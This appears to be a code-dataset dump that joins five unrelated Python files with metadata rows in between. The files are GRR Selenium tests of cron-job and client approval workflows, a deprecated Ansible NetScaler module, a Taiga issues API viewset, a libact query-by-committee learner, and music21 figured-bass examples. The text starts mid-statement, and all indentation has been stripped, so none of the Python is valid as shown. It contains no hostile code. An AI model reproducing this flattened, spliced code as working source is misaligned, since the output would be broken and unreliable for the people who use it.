"css=button[name=Proceed][disabled!='']"))
# Click on "Cancel" and check that dialog disappears.
self.Click("css=button[name=Cancel]")
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsElementPresent,
"css=button[name=ModifyHunt]:not([disabled])")
# Modify hunt
# Click on Modify button and check that dialog appears.
self.Click("css=button[name=ModifyHunt]")
self.WaitUntil(self.IsTextPresent,
"Modify a hunt")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt modified successfully!")
self.assertTrue(self.IsElementPresent(
"css=button[name=Proceed][disabled!='']"))
# Click on "Cancel" and check that dialog disappears.
self.Click("css=button[name=Cancel]")
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
def testCronJobACLWorkflow(self):
with self.ACLChecksDisabled():
cronjobs.ScheduleSystemCronFlows(token=self.token)
cronjobs.CRON_MANAGER.DisableJob(
rdfvalue.RDFURN("aff4:/cron/OSBreakDown"))
# Open up and click on Cron Job Viewer.
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageCron]")
# Select a cron job
self.Click("css=td:contains('OSBreakDown')")
# Click on Enable button and check that dialog appears.
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
# This asks the user "test" (which is us) to approve the request.
self.Type("css=input[id=acl_approver]", "test")
self.Type("css=input[id=acl_reason]", self.reason)
self.Click("acl_dialog_submit")
# "Request Approval" dialog should go away
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.Open("/")
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.Click("css=td:contains('Please grant access to a cron job')")
self.WaitUntilContains("Grant Access for GRR Use",
self.GetText, "css=h2:contains('Grant')")
self.WaitUntil(self.IsTextPresent, "The user test has requested")
# Cron job overview should be visible
self.WaitUntil(self.IsTextPresent, "aff4:/cron/OSBreakDown")
self.WaitUntil(self.IsTextPresent, "CRON_ARGS")
self.Click("css=button:contains('Approve')")
self.WaitUntil(self.IsTextPresent,
"You have granted access for aff4:/cron/OSBreakDown to test")
# Now test starts up
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.WaitUntil(self.GetText,
"css=td:contains('has granted you access to "
"a cron job')")
self.Click("css=tr:contains('has granted you access') a")
# Enable OSBreakDown cron job (it should be selected by default).
self.Click("css=td:contains('OSBreakDown')")
# Click on Enable and wait for dialog again.
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is insufficient - we need 2 approvers.
self.WaitUntilContains("Requires 2 approvers for access.",
self.GetText, "css=div#acl_form")
# Lets add another approver.
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(
flow_name="GrantCronJobApprovalFlow",
subject_urn=rdfvalue.RDFURN("aff4:/cron/OSBreakDown"),
reason=self.reason, delegate="test", token=token)
# Now test starts up
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.Click("css=tr:contains('has granted you access') a")
# Wait for modal backdrop to go away.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsTextPresent, "OSBreakDown")
# Enable OSBreakDown cron job (it should be selected by default).
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is still insufficient - one of the approvers should have
# "admin" label.
self.WaitUntilContains("At least 1 approver(s) should have 'admin' label.",
self.GetText, "css=div#acl_form")
# Let's make "approver" an admin.
with self.ACLChecksDisabled():
self.CreateAdminUser("approver")
# And try again
self.Open("/")
self.Click("css=a[grrtarget=ManageCron]")
# Select and enable OSBreakDown cron job.
self.Click("css=td:contains('OSBreakDown')")
# Click on Enable button and check that dialog appears.
self.Click("css=button[name=EnableCronJob]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to ENABLE this cron job?")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Cron job was ENABLEd successfully!")
def testEmailClientApprovalRequestLinkLeadsToACorrectPage(self):
with self.ACLChecksDisabled():
client_id = self.SetupClients(1)[0]
messages_sent = []
def SendEmailStub(unused_from_user, unused_to_user, unused_subject,
message, **unused_kwargs):
messages_sent.append(message)
# Request client approval, it will trigger an email message.
with utils.Stubber(email_alerts, "SendEmail", SendEmailStub):
flow.GRRFlow.StartFlow(client_id=client_id,
flow_name="RequestClientApprovalFlow",
reason="Please please let me",
subject_urn=client_id,
approver="test",
token=rdfvalue.ACLToken(username="iwantapproval",
reason="test"))
self.assertEqual(len(messages_sent), 1)
# Extract link from the message text and open it.
m = re.search(r"href='(.+?)'", messages_sent[0], re.MULTILINE)
link = urlparse.urlparse(m.group(1))
self.Open(link.path + "?" + link.query + "#" + link.fragment)
# Check that requestor's username and reason are correctly displayed.
self.WaitUntil(self.IsTextPresent, "iwantapproval")
self.WaitUntil(self.IsTextPresent, "Please please let me")
# Check that host information is displayed.
self.WaitUntil(self.IsTextPresent, str(client_id))
self.WaitUntil(self.IsTextPresent, "HOSTNAME")
self.WaitUntil(self.IsTextPresent, "MAC_ADDRESS")
def main(argv):
# Run the full test suite
runtests_test.SeleniumTestProgram(argv=argv)
if __name__ == "__main__":
flags.StartMain(main)
| apache-2.0 | -9,013,492,060,328,073,000 | 36.291603 | 80 | 0.654426 | false |
photoninger/ansible | lib/ansible/modules/network/citrix/_netscaler.py | 15 | 4873 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2013, Nandor Sivok <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: netscaler
version_added: "1.1"
short_description: Manages Citrix NetScaler entities
description:
- Manages Citrix NetScaler server and service entities.
deprecated: In 2.4 use M(netscaler_service) and M(netscaler_server) instead.
options:
nsc_host:
description:
- Hostname or ip of your netscaler.
required: true
nsc_protocol:
description:
- Protocol used to access netscaler.
default: https
user:
description:
- Username.
required: true
password:
description:
- Password.
required: true
action:
description:
- The action you want to perform on the entity.
choices: [ disable, enable ]
default: disable
name:
description:
- Name of the entity.
required: true
default: hostname
type:
description:
- Type of the entity.
choices: [ server, service ]
default: server
validate_certs:
description:
- If C(no), SSL certificates for the target url will not be validated.
- This should only be used on personally controlled sites using self-signed certificates.
type: bool
default: 'yes'
author:
- Nandor Sivok (@dominis)
'''
EXAMPLES = '''
- name: Disable the server
netscaler:
nsc_host: nsc.example.com
user: apiuser
password: apipass
- name: Enable the server
netscaler:
nsc_host: nsc.example.com
user: apiuser
password: apipass
action: enable
- name: Disable the service local:8080
netscaler:
nsc_host: nsc.example.com
user: apiuser
password: apipass
name: local:8080
type: service
action: disable
'''
import base64
import json
import socket
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils._text import to_native
from ansible.module_utils.urls import fetch_url
class netscaler(object):
_nitro_base_url = '/nitro/v1/'
def __init__(self, module):
self.module = module
def http_request(self, api_endpoint, data_json=None):
data_josn = {} if data_json is None else data_json
request_url = self._nsc_protocol + '://' + self._nsc_host + self._nitro_base_url + api_endpoint
data_json = urlencode(data_json)
if not len(data_json):
data_json = None
auth = base64.encodestring('%s:%s' % (self._nsc_user, self._nsc_pass)).replace('\n', '').strip()
headers = {
'Authorization': 'Basic %s' % auth,
'Content-Type': 'application/x-www-form-urlencoded',
}
response, info = fetch_url(self.module, request_url, data=data_json, headers=headers)
return json.load(response)
def prepare_request(self, action):
resp = self.http_request(
'config',
{
"object":
{
"params": {"action": action},
self._type: {"name": self._name}
}
}
)
return resp
def core(module):
n = netscaler(module)
n._nsc_host = module.params.get('nsc_host')
n._nsc_user = module.params.get('user')
n._nsc_pass = module.params.get('password')
n._nsc_protocol = module.params.get('nsc_protocol')
n._name = module.params.get('name')
n._type = module.params.get('type')
action = module.params.get('action')
r = n.prepare_request(action)
return r['errorcode'], r
def main():
module = AnsibleModule(
argument_spec=dict(
nsc_host=dict(type='str', required=True),
nsc_protocol=dict(type='str', default='https'),
user=dict(type='str', required=True),
password=dict(type='str', required=True, no_log=True),
action=dict(type='str', default='enable', choices=['disable', 'enable']),
name=dict(type='str', default=socket.gethostname()),
type=dict(type='str', default='server', choices=['server', 'service']),
validate_certs=dict(type='bool', default=True),
),
)
rc = 0
try:
rc, result = core(module)
except Exception as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
if rc != 0:
module.fail_json(rc=rc, msg=result)
else:
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,848,312,706,524,774,000 | 25.483696 | 104 | 0.610507 | false |
dycodedev/taiga-back | taiga/projects/issues/api.py | 1 | 11959 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.utils.translation import ugettext as _
from django.db.models import Q
from django.http import HttpResponse
from taiga.base import filters
from taiga.base import exceptions as exc
from taiga.base import response
from taiga.base.decorators import detail_route, list_route
from taiga.base.api import ModelCrudViewSet, ModelListViewSet
from taiga.base.api.utils import get_object_or_404
from taiga.users.models import User
from taiga.projects.notifications.mixins import WatchedResourceMixin, WatchersViewSetMixin
from taiga.projects.occ import OCCResourceMixin
from taiga.projects.history.mixins import HistoryResourceMixin
from taiga.projects.models import Project, IssueStatus, Severity, Priority, IssueType
from taiga.projects.milestones.models import Milestone
from taiga.projects.votes.mixins.viewsets import VotedResourceMixin, VotersViewSetMixin
from . import models
from . import services
from . import permissions
from . import serializers
class IssueViewSet(OCCResourceMixin, VotedResourceMixin, HistoryResourceMixin, WatchedResourceMixin,
ModelCrudViewSet):
queryset = models.Issue.objects.all()
permission_classes = (permissions.IssuePermission, )
filter_backends = (filters.CanViewIssuesFilterBackend,
filters.OwnersFilter,
filters.AssignedToFilter,
filters.StatusesFilter,
filters.IssueTypesFilter,
filters.SeveritiesFilter,
filters.PrioritiesFilter,
filters.TagsFilter,
filters.WatchersFilter,
filters.QFilter,
filters.OrderByFilterMixin)
retrieve_exclude_filters = (filters.OwnersFilter,
filters.AssignedToFilter,
filters.StatusesFilter,
filters.IssueTypesFilter,
filters.SeveritiesFilter,
filters.PrioritiesFilter,
filters.TagsFilter,
filters.WatchersFilter,)
filter_fields = ("project",
"status__is_closed")
order_by_fields = ("type",
"status",
"severity",
"priority",
"created_date",
"modified_date",
"owner",
"assigned_to",
"subject",
"total_voters")
def get_serializer_class(self, *args, **kwargs):
if self.action in ["retrieve", "by_ref"]:
return serializers.IssueNeighborsSerializer
if self.action == "list":
return serializers.IssueListSerializer
return serializers.IssueSerializer
def update(self, request, *args, **kwargs):
self.object = self.get_object_or_none()
project_id = request.DATA.get('project', None)
if project_id and self.object and self.object.project.id != project_id:
try:
new_project = Project.objects.get(pk=project_id)
self.check_permissions(request, "destroy", self.object)
self.check_permissions(request, "create", new_project)
sprint_id = request.DATA.get('milestone', None)
if sprint_id is not None and new_project.milestones.filter(pk=sprint_id).count() == 0:
request.DATA['milestone'] = None
status_id = request.DATA.get('status', None)
if status_id is not None:
try:
old_status = self.object.project.issue_statuses.get(pk=status_id)
new_status = new_project.issue_statuses.get(slug=old_status.slug)
request.DATA['status'] = new_status.id
except IssueStatus.DoesNotExist:
request.DATA['status'] = new_project.default_issue_status.id
priority_id = request.DATA.get('priority', None)
if priority_id is not None:
try:
old_priority = self.object.project.priorities.get(pk=priority_id)
new_priority = new_project.priorities.get(name=old_priority.name)
request.DATA['priority'] = new_priority.id
except Priority.DoesNotExist:
request.DATA['priority'] = new_project.default_priority.id
severity_id = request.DATA.get('severity', None)
if severity_id is not None:
try:
old_severity = self.object.project.severities.get(pk=severity_id)
new_severity = new_project.severities.get(name=old_severity.name)
request.DATA['severity'] = new_severity.id
except Severity.DoesNotExist:
request.DATA['severity'] = new_project.default_severity.id
type_id = request.DATA.get('type', None)
if type_id is not None:
try:
old_type = self.object.project.issue_types.get(pk=type_id)
new_type = new_project.issue_types.get(name=old_type.name)
request.DATA['type'] = new_type.id
except IssueType.DoesNotExist:
request.DATA['type'] = new_project.default_issue_type.id
except Project.DoesNotExist:
return response.BadRequest(_("The project doesn't exist"))
return super().update(request, *args, **kwargs)
def get_queryset(self):
qs = super().get_queryset()
qs = qs.prefetch_related("attachments")
qs = self.attach_votes_attrs_to_queryset(qs)
return self.attach_watchers_attrs_to_queryset(qs)
def pre_save(self, obj):
if not obj.id:
obj.owner = self.request.user
super().pre_save(obj)
def pre_conditions_on_save(self, obj):
super().pre_conditions_on_save(obj)
if obj.milestone and obj.milestone.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this sprint "
"to this issue."))
if obj.status and obj.status.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this status "
"to this issue."))
if obj.severity and obj.severity.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this severity "
"to this issue."))
if obj.priority and obj.priority.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this priority "
"to this issue."))
if obj.type and obj.type.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this type "
"to this issue."))
@list_route(methods=["GET"])
def by_ref(self, request):
ref = request.QUERY_PARAMS.get("ref", None)
project_id = request.QUERY_PARAMS.get("project", None)
issue = get_object_or_404(models.Issue, ref=ref, project_id=project_id)
return self.retrieve(request, pk=issue.pk)
@list_route(methods=["GET"])
def filters_data(self, request, *args, **kwargs):
project_id = request.QUERY_PARAMS.get("project", None)
project = get_object_or_404(Project, id=project_id)
filter_backends = self.get_filter_backends()
types_filter_backends = (f for f in filter_backends if f != filters.IssueTypesFilter)
statuses_filter_backends = (f for f in filter_backends if f != filters.StatusesFilter)
assigned_to_filter_backends = (f for f in filter_backends if f != filters.AssignedToFilter)
owners_filter_backends = (f for f in filter_backends if f != filters.OwnersFilter)
priorities_filter_backends = (f for f in filter_backends if f != filters.PrioritiesFilter)
severities_filter_backends = (f for f in filter_backends if f != filters.SeveritiesFilter)
tags_filter_backends = (f for f in filter_backends if f != filters.TagsFilter)
queryset = self.get_queryset()
querysets = {
"types": self.filter_queryset(queryset, filter_backends=types_filter_backends),
"statuses": self.filter_queryset(queryset, filter_backends=statuses_filter_backends),
"assigned_to": self.filter_queryset(queryset, filter_backends=assigned_to_filter_backends),
"owners": self.filter_queryset(queryset, filter_backends=owners_filter_backends),
"priorities": self.filter_queryset(queryset, filter_backends=priorities_filter_backends),
"severities": self.filter_queryset(queryset, filter_backends=severities_filter_backends),
"tags": self.filter_queryset(queryset)
}
return response.Ok(services.get_issues_filters_data(project, querysets))
@list_route(methods=["GET"])
def csv(self, request):
uuid = request.QUERY_PARAMS.get("uuid", None)
if uuid is None:
return response.NotFound()
project = get_object_or_404(Project, issues_csv_uuid=uuid)
queryset = project.issues.all().order_by('ref')
data = services.issues_to_csv(project, queryset)
csv_response = HttpResponse(data.getvalue(), content_type='application/csv; charset=utf-8')
csv_response['Content-Disposition'] = 'attachment; filename="issues.csv"'
return csv_response
@list_route(methods=["POST"])
def bulk_create(self, request, **kwargs):
serializer = serializers.IssuesBulkSerializer(data=request.DATA)
if serializer.is_valid():
data = serializer.data
project = Project.objects.get(pk=data["project_id"])
self.check_permissions(request, 'bulk_create', project)
issues = services.create_issues_in_bulk(
data["bulk_issues"], project=project, owner=request.user,
status=project.default_issue_status, severity=project.default_severity,
priority=project.default_priority, type=project.default_issue_type,
callback=self.post_save, precall=self.pre_save)
issues_serialized = self.get_serializer_class()(issues, many=True)
return response.Ok(data=issues_serialized.data)
return response.BadRequest(serializer.errors)
class IssueVotersViewSet(VotersViewSetMixin, ModelListViewSet):
permission_classes = (permissions.IssueVotersPermission,)
resource_model = models.Issue
class IssueWatchersViewSet(WatchersViewSetMixin, ModelListViewSet):
permission_classes = (permissions.IssueWatchersPermission,)
resource_model = models.Issue
| agpl-3.0 | 6,412,214,018,278,567,000 | 46.63745 | 103 | 0.61487 | false |
ntucllab/libact | libact/query_strategies/query_by_committee.py | 1 | 7425 | """Query by committee
This module contains a class that implements Query by committee active learning
algorithm.
"""
from __future__ import division
import logging
import math
import numpy as np
from libact.base.dataset import Dataset
from libact.base.interfaces import QueryStrategy, ProbabilisticModel
import libact.models
from libact.utils import inherit_docstring_from, seed_random_state, zip
LOGGER = logging.getLogger(__name__)
class QueryByCommittee(QueryStrategy):
r"""Query by committee
Parameters
----------
models : list of :py:mod:`libact.models` instances or str
This parameter accepts a list of initialized libact Model instances,
or class names of libact Model classes to determine the models to be
included in the committee to vote for each unlabeled instance.
disagreement : ['vote', 'kl_divergence'], optional (default='vote')
Sets the method for measuring disagreement between models.
'vote' represents vote entropy.
kl_divergence requires models being ProbabilisticModel
random_state : {int, np.random.RandomState instance, None}, optional (default=None)
If int or None, random_state is passed as parameter to generate
np.random.RandomState instance. if np.random.RandomState instance,
random_state is the random number generate.
Attributes
----------
students : list, shape = (len(models))
A list of the model instances used in this algorithm.
random_states\_ : np.random.RandomState instance
The random number generator using.
Examples
--------
Here is an example of declaring a QueryByCommittee query_strategy object:
.. code-block:: python
from libact.query_strategies import QueryByCommittee
from libact.models import LogisticRegression
qs = QueryByCommittee(
dataset, # Dataset object
models=[
LogisticRegression(C=1.0),
LogisticRegression(C=0.1),
],
)
References
----------
.. [1] Seung, H. Sebastian, Manfred Opper, and Haim Sompolinsky. "Query by
committee." Proceedings of the fifth annual workshop on
Computational learning theory. ACM, 1992.
"""
def __init__(self, *args, **kwargs):
super(QueryByCommittee, self).__init__(*args, **kwargs)
self.disagreement = kwargs.pop('disagreement', 'vote')
models = kwargs.pop('models', None)
if models is None:
raise TypeError(
"__init__() missing required keyword-only argument: 'models'"
)
elif not models:
raise ValueError("models list is empty")
if self.disagreement == 'kl_divergence':
for model in models:
if not isinstance(model, ProbabilisticModel):
raise TypeError(
"Given disagreement set as 'kl_divergence', all models"
"should be ProbabilisticModel."
)
random_state = kwargs.pop('random_state', None)
self.random_state_ = seed_random_state(random_state)
self.students = list()
for model in models:
if isinstance(model, str):
self.students.append(getattr(libact.models, model)())
else:
self.students.append(model)
self.n_students = len(self.students)
self.teach_students()
def _vote_disagreement(self, votes):
"""
Return the disagreement measurement of the given number of votes.
It uses the vote vote to measure the disagreement.
Parameters
----------
votes : list of int, shape==(n_samples, n_students)
The predictions that each student gives to each sample.
Returns
-------
disagreement : list of float, shape=(n_samples)
The vote entropy of the given votes.
"""
ret = []
for candidate in votes:
ret.append(0.0)
lab_count = {}
for lab in candidate:
lab_count[lab] = lab_count.setdefault(lab, 0) + 1
# Using vote entropy to measure disagreement
for lab in lab_count.keys():
ret[-1] -= lab_count[lab] / self.n_students * \
math.log(float(lab_count[lab]) / self.n_students)
return ret
def _kl_divergence_disagreement(self, proba):
"""
Calculate the Kullback-Leibler (KL) divergence disaagreement measure.
Parameters
----------
proba : array-like, shape=(n_samples, n_students, n_class)
Returns
-------
disagreement : list of float, shape=(n_samples)
The kl_divergence of the given probability.
"""
n_students = np.shape(proba)[1]
consensus = np.mean(proba, axis=1) # shape=(n_samples, n_class)
# average probability of each class across all students
consensus = np.tile(consensus, (n_students, 1, 1)).transpose(1, 0, 2)
kl = np.sum(proba * np.log(proba / consensus), axis=2)
return np.mean(kl, axis=1)
def _labeled_uniform_sample(self, sample_size):
"""sample labeled entries uniformly"""
X, y = self.dataset.get_labeled_entries()
samples_idx = [self.random_state_.randint(0, X.shape[0]) for _ in range(sample_size)]
return Dataset(X[samples_idx], np.array(y)[samples_idx])
def teach_students(self):
"""
Train each model (student) with the labeled data using bootstrap
aggregating (bagging).
"""
dataset = self.dataset
for student in self.students:
bag = self._labeled_uniform_sample(int(dataset.len_labeled()))
while bag.get_num_of_labels() != dataset.get_num_of_labels():
bag = self._labeled_uniform_sample(int(dataset.len_labeled()))
LOGGER.warning('There is student receiving only one label,'
're-sample the bag.')
student.train(bag)
@inherit_docstring_from(QueryStrategy)
def update(self, entry_id, label):
# Train each model with newly updated label.
self.teach_students()
@inherit_docstring_from(QueryStrategy)
def make_query(self):
dataset = self.dataset
unlabeled_entry_ids, X_pool = dataset.get_unlabeled_entries()
if self.disagreement == 'vote':
# Let the trained students vote for unlabeled data
votes = np.zeros((len(X_pool), len(self.students)))
for i, student in enumerate(self.students):
votes[:, i] = student.predict(X_pool)
vote_entropy = self._vote_disagreement(votes)
ask_idx = self.random_state_.choice(
np.where(np.isclose(vote_entropy, np.max(vote_entropy)))[0])
elif self.disagreement == 'kl_divergence':
proba = []
for student in self.students:
proba.append(student.predict_proba(X_pool))
proba = np.array(proba).transpose(1, 0, 2).astype(float)
avg_kl = self._kl_divergence_disagreement(proba)
ask_idx = self.random_state_.choice(
np.where(np.isclose(avg_kl, np.max(avg_kl)))[0])
return unlabeled_entry_ids[ask_idx]
| bsd-2-clause | 4,343,440,021,166,972,000 | 34.526316 | 93 | 0.598923 | false |
arnavd96/Cinemiezer | myvenv/lib/python3.4/site-packages/music21/figuredBass/examples.py | 1 | 19212 | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: examples.py
# Purpose: music21 class which allows running of test cases
# Authors: Jose Cabal-Ugaz
#
# Copyright: Copyright © 2010-2011 Michael Scott Cuthbert and the music21 Project
# License: LGPL or BSD, see license.txt
#-------------------------------------------------------------------------------
'''
Each of the example methods in this module provides a figured bass line as a
:class:`~music21.figuredBass.realizer.FiguredBassLine` instance.
These can be realized by calling :meth:`~music21.figuredBass.realizer.FiguredBassLine.realize`, which takes in an
optional :class:`~music21.figuredBass.rules.Rules` object. The result is a :class:`~music21.figuredBass.realizer.Realization`
object which can generate realizations as instances of :class:`~music21.stream.Score`. These realizations can then be displayed
in external software such as MuseScore or Finale by calling :meth:`~music21.base.Music21Object.show`.
'''
import copy
import unittest
from music21.figuredBass import realizer
from music21.figuredBass import rules
#-------------------------------------------------------------------------------
def exampleA():
'''
This example was a homework assignment for 21M.302: Harmony & Counterpoint II
at MIT in the fall of 2010, taught by Charles Shadle of the MIT Music Program.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleA()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineA.*
:width: 700
The following is a realization of fbLine in four parts using the default rules set.
The soprano part is limited to stepwise motion, and the alto and tenor parts are
limited to motions within a perfect octave.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.partMovementLimits = [(1,2),(2,12),(3,12)]
>>> fbRealization1 = fbLine.realize(fbRules)
>>> fbRealization1.getNumSolutions()
360
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1A.*
:width: 700
Now, the restriction on upper parts being within a perfect octave of each other is
removed, and fbLine is realized again.
>>> fbRules.upperPartsMaxSemitoneSeparation = None
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.keyboardStyleOutput = False
>>> fbRealization2.getNumSolutions()
3713168
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2A.*
:width: 700
'''
from music21 import converter
s = converter.parse("tinynotation: 3/2 C2 D2_6 E2_6 F2_6 C#2_b7,5,3 D2 BB2_#6,5,3 C2_6 AA#2_7,5,#3 BB1_6,4 BB2_7,#5,#3 E1.", makeNotation=False)
return realizer.figuredBassFromStream(s)
def exampleD():
'''
This example was a homework assignment for 21M.302: Harmony & Counterpoint II
at MIT in the fall of 2010, taught by Charles Shadle of the MIT Music Program.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleD()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineD.*
:width: 700
The following is a realization of fbLine in four parts using the default rules set.
The soprano part is limited to stepwise motion, and the alto and tenor parts are
limited to motions within a perfect octave.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.partMovementLimits = [(1,2),(2,12),(3,12)]
>>> fbRealization1 = fbLine.realize(fbRules)
>>> fbRealization1.getNumSolutions()
1560
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1D.*
:width: 700
Now, the restriction on voice overlap is lifted, which is common in keyboard-style
figured bass, and fbLine is realized again. Voice overlap can be seen in the fourth
measure.
>>> fbRules.forbidVoiceOverlap = False
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.getNumSolutions()
109006
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2D.*
:width: 700
Now, the restriction on voice overlap is reset, but the restriction on the upper parts
being within a perfect octave of each other is removed. fbLine is realized again.
>>> fbRules.forbidVoiceOverlap = True
>>> fbRules.upperPartsMaxSemitoneSeparation = None
>>> fbRealization3 = fbLine.realize(fbRules)
>>> fbRealization3.getNumSolutions()
29629539
>>> fbRealization3.keyboardStyleOutput = False
>>> #_DOCS_SHOW fbRealization3.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol3D.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 3/4 BB4 C#4_#6 D4_6 E2 E#4_7,5,#3 F#2_6,4 F#4_5,#3 G2 E4_6 F#2_6,4 E4_#4,2 D2_6 EE4_7,5,#3 AA2.", makeNotation=False)
s.insert(0, key.Key('b'))
return realizer.figuredBassFromStream(s)
def exampleB():
'''
This example was retrieved from page 114 of *The Music Theory Handbook* by Marjorie Merryman.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleB()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineB.*
:width: 700
First, fbLine is realized with the default rules set.
>>> fbRealization1 = fbLine.realize()
>>> fbRealization1.getNumSolutions()
422
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1B.*
:width: 700
Now, a Rules object is created, and the restriction that the chords
need to be complete is lifted. fbLine is realized once again.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.forbidIncompletePossibilities = False
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.getNumSolutions()
188974
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2B.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 D4 A4_7,5,#3 B-4 F4_6 G4_6 AA4_7,5,#3 D2", makeNotation=False)
s.insert(0, key.Key('d'))
return realizer.figuredBassFromStream(s)
def exampleC():
'''
This example was retrieved from page 114 of *The Music Theory Handbook* by Marjorie Merryman.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleC()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineC.*
:width: 700
First, fbLine is realized with the default rules set.
>>> fbRealization1 = fbLine.realize()
>>> fbRealization1.getNumSolutions()
833
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1C.*
:width: 700
Now, parallel fifths are allowed in realizations. The image below
shows one of them. There is a parallel fifth between the bass and
alto parts going from the half-diminished 6,5 (B,F#) to the dominant
seventh (C#,G#) in the second measure.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.forbidParallelFifths = False
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.getNumSolutions()
2427
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2C.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 FF#4 GG#4_#6 AA4_6 FF#4 BB4_6,5 C#4_7,5,#3 F#2", makeNotation=False)
s.insert(0, key.Key('f#'))
return realizer.figuredBassFromStream(s)
def V43ResolutionExample():
'''
The dominant 4,3 can resolve to either the tonic 5,3 or tonic 6,3. The proper resolution
is dependent on the bass note of the tonic, and is determined in context, as shown in the
following figured bass realization.
>>> from music21.figuredBass import examples
>>> fbLine = examples.V43ResolutionExample()
>>> fbRealization = fbLine.realize()
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_V43.*
:width: 350
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 D2 E2_4,3 D2_5,3 E2_4,3 F#1_6,3", makeNotation=False)
s.insert(0, key.Key('D'))
return realizer.figuredBassFromStream(s)
